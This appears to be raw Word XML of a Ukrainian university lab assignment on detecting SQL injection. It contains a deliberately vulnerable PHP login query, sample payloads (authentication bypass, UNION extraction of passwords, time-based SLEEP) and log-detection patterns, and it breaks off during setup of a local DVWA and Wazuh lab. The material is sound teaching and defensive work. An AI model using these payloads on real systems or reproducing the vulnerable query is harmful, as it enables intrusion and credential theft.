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7719" w14:textId="2A7FF280" w:rsidR="00915EA4" w:rsidRPr="00D84170" w:rsidRDefault="00D84170" w:rsidP="00D84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170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№6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986DE43" w14:textId="6D0C1168" w:rsidR="00D84170" w:rsidRPr="00470F3E" w:rsidRDefault="00D84170" w:rsidP="00D84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ДОСЛІДЖЕННЯ </w:t>
      </w:r>
      <w:r w:rsidR="008F6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МЕТОДІВ ВИЯВЛЕННЯ ТА АНАЛІЗУ АТАК ТИПУ </w:t>
      </w:r>
      <w:r w:rsidR="008F6D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="008F6D75" w:rsidRPr="008F6D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6D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE97E12" w14:textId="13F7E63B" w:rsidR="00D84170" w:rsidRPr="00094E56" w:rsidRDefault="00D84170" w:rsidP="00D841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94E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роботи: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28482F64" w14:textId="17AD5EFC" w:rsidR="00D84170" w:rsidRDefault="00A10B9C" w:rsidP="00094E56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Дослідити механізми виникнення вразливостей типу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веб-додатках та проаналізувати принципи їх експлуатації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5D5FC" w14:textId="01DCB36D" w:rsidR="00D84170" w:rsidRDefault="00A10B9C" w:rsidP="00094E56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Набути практичних навичок виявлення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-атак шляхом ручного тестування (на прикладі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та з використанням автоматизованого інструменту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  <w:r w:rsidRPr="00A10B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49319606" w14:textId="08E684EE" w:rsidR="00D84170" w:rsidRDefault="00094E56" w:rsidP="00094E56">
      <w:pPr>
        <w:pStyle w:val="a3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з процесом моніторингу та детектування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094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094E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системі централізованого лог-аналізу та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00094E5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базі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 w:rsidRPr="00094E5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навчитися створювати власні правила виявлення атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983C932" w14:textId="5C7EF6A7" w:rsidR="00D84170" w:rsidRPr="00D84170" w:rsidRDefault="00D84170" w:rsidP="00D841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170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0DC944F4" w14:textId="4F616EED" w:rsidR="00D84170" w:rsidRDefault="00D84170" w:rsidP="00470F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D84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D8417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 w:rsidRPr="00D84170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs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клас вразливостей веб-додатків, що виникає через некоректну обробку користувацького вводу під час формування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D8417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запитів до бази даних. Якщо вхідні дані напряму вбудовуються в запит без параметризації або належної фільтрації, зловмисник може змінити його логіку, ін’єктувавши власні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D8417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конструкції.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E95668" w14:textId="61BF0843" w:rsidR="00D84170" w:rsidRDefault="00D84170" w:rsidP="00D8417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Наслідки експлуатації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включати:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACE2A7" w14:textId="7B4B5DE0" w:rsidR="00D84170" w:rsidRDefault="00D84170" w:rsidP="00094FC4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Обхід механізмів автентифікації – отримання доступу до облікових записів без валідних облікових даних шляхом модифікації умов у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94FC4"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="00094F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5D5DCD" w14:textId="6005441F" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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Несанкціоноване отримання даних – ексфільтрація конфіденційної інформації (облікові записи, хеші паролів, персональні дані тощо).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451337AC" w14:textId="168527FC" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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Модифікація або знищення даних – виконання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UPDATE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DELETE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INSERT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запитів поза передбаченою бізнес-логікою.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BB5CF" w14:textId="79A2B72D" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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Компрометація сервера – у разі наявності небезпечних розширень або надмірних привілеїв БД можливе виконання системних команд та подальша ескалація доступу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E1157" w14:textId="77777777" w:rsidR="00D925AC" w:rsidRDefault="00D925AC" w:rsidP="00094F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D74B4" w14:textId="77777777" w:rsidR="00D925AC" w:rsidRDefault="00D925AC" w:rsidP="00094F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5A28C3" w14:textId="010BFF4A" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094F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FC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Типи </w:t>
      </w:r>
      <w:r w:rsidRPr="00094FC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SQL Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="00094FC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA02CA" w14:textId="69A5956D" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094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-ін’єкції класифікуються залежно від способу отримання результату та каналу взаємодії з базою даних. Основні типи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10626DE3" w14:textId="322F6C85" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4">
      <w:pPr>
        <w:pStyle w:val="a3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класична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результат ін’єкції повертається у стандартній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відповіді застосунку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606308A6" w14:textId="0784A7B1" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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Error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інформація витягується через повідомлення про помилки СУБД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0721F244" w14:textId="4C3E74A6" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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094F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094F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оператор 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додавання результатів довільного запиту до легітимного.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB48F7" w14:textId="4D6FACAB" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4">
      <w:pPr>
        <w:pStyle w:val="a3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Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00094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 w:rsidRPr="00094F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прямого виводу даних немає, але їх можна відновити опосередковано:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504003AC" w14:textId="19AFE03E" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4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Boolean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094F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аналізується різниця у відповідях сервера залежно від істинності умови.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A7887" w14:textId="15228248" w:rsidR="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="00094FC4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="36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094F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094FC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використовуються штучні затримки виконання запиту для визначення результату логічних виразів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF997A" w14:textId="0FEC568F" w:rsidR="00094FC4" w:rsidRPr="00094FC4" w:rsidRDefault="00094FC4" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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0215B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215B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band</w:t>
      </w:r>
      <w:r w:rsidRPr="00021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5B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– ексфільтрація даних відбувається через альтернативні канали зв’язку (наприклад, </w:t>
      </w:r>
      <w:r w:rsidR="000215B1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="000215B1" w:rsidRPr="00021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5B1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0215B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215B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>), якщо стандартний канал відповіді недоступний або обмежений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F118C" w14:textId="2552D19E" w:rsidR="00094FC4" w:rsidRDefault="000215B1" w:rsidP="00094F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5B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Приклад вразливого коду</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75405D15" w14:textId="6BC29F3E" w:rsidR="000215B1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Типовий приклад вразливого до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0215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коду:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13696A38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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1C9326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>$username = $_POST['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39460A79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>$password = $_POST['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C8C7D" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00677722" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F766AA8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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>ВРАЗЛИВИЙ</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>КОД</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>без</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>санітізації</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>вводу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6814D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>$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB51BE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>$result = mysqli_query($connection, $query);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BE016" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00CD7BAE" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B39720" w14:textId="6A82E76B" w:rsidR="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B1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наведеному прикладі вхідні дані не перевіряються і безпосередньо вставляються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запит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4EADC" w14:textId="77777777" w:rsidR="00D925AC" w:rsidRDefault="00D925AC" w:rsidP="000215B1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5CC6A2" w14:textId="7BEF4A41" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="00021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5B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Приклади експлойтів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C45A08" w14:textId="0E766E2E" w:rsidR="00D84170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Обхід автентифікації:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F93D4" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000215B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Username: admin' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7015B" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00677722" w:rsidRDefault="000215B1" w:rsidP="000215B1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Password: anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F0389" w14:textId="68467C0D" w:rsidR="000215B1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Результуючий запит</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788DEDB" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00677722" w:rsidRDefault="000215B1" w:rsidP="000215B1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SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311F615" w14:textId="2A840F4A" w:rsidR="000215B1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Витік даних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8923AF0" w14:textId="4E9E4AA0" w:rsidR="000215B1" w:rsidRPr="00D925AC" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B606D" w14:textId="5ED4D255" w:rsidR="000215B1" w:rsidRPr="000215B1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Time-based Blind SQLi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84375F" w14:textId="751BBCE5" w:rsidR="000215B1" w:rsidRPr="00D925AC" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">(1=1, </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SLEEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(5), 0</w:t>
      </w:r>
      <w:r w:rsidR="00D925AC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5FAC9E" w14:textId="246AFD5E" w:rsidR="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B1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Індикатори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SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D92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Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D925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логах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786D53E" w14:textId="3375459F" w:rsidR="000215B1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веб-логах шукайте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06004773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 xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>ключові</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>слова</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SELECT, UNION, OR, AND, --, #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C1C232" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00677722" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Спеціальні</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>символи</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: ', ", ;, /*, */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43D394" w14:textId="77777777" w:rsidR="000215B1" w:rsidRPr="00677722" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>функції</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: SLEEP(), BENCHMARK(), LOAD_FILE()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04189F53" w14:textId="08DDA8E3" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Типові</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>патерни</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: ' OR '1'='1, 1=1, admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCBD1A" w14:textId="4533B7E3" w:rsidR="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B1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Сигнатури інструментів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22552E" w14:textId="72F73830" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215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SQLMap: </w:t>
      </w:r>
      <w:r w:rsidRPr="000215B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap/1.x.x </w:t>
      </w:r>
      <w:r w:rsidRPr="000215B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="000215B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> User-Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11337124" w14:textId="7F5C46BF" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215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Havij: </w:t>
      </w:r>
      <w:r w:rsidRPr="000215B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mozilla/4.0 (compatible; Havij)</w:t>
      </w:r>
      <w:r w:rsidRPr="000215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AFEAF8" w14:textId="721A8B3B" w:rsidR="000215B1" w:rsidRPr="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B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jSQL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>специфічні патерни запитів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D0389" w14:textId="14C7572D" w:rsidR="00D84170" w:rsidRDefault="00D84170" w:rsidP="000215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4170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання на лабораторну роботу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6825DA" w14:textId="05B956EA" w:rsidR="000215B1" w:rsidRDefault="000215B1" w:rsidP="000215B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Завдання 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середовища та розвідка </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FEE4DB" w14:textId="42AD8740" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="000215B1" w:rsidP="00323C7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Запустіть усі необхідні сервіси:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2FA2A" w14:textId="77777777" w:rsidR="00323C75" w:rsidRPr="00677722" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./lab-management.sh start vuln-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B800E4" w14:textId="162A7366" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>./lab-management.sh start wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE063D" w14:textId="62C3593F" w:rsidR="000215B1" w:rsidRPr="00323C75" w:rsidRDefault="000215B1" w:rsidP="000215B1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Перевірте доступність цільового додатку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236EE22" w14:textId="7B43ACE9" w:rsidR="000215B1" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>curl -I http://localhost:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0CDE9" w14:textId="6262B3E9" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C7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браузері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32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323C75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBF786" w14:textId="69EC485C" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068DD4DF" w14:textId="374AB8FD" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C7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Увійдіть з обліковими даними:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A865AF" w14:textId="77777777" w:rsidR="00323C75" w:rsidRPr="00CD7BAE" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FFDDBD" w14:textId="48A79262" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3D054" w14:textId="134B7F4C" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75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Встановіть рівень безпеки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321045ED" w14:textId="77777777" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00323C75">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдіть до </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
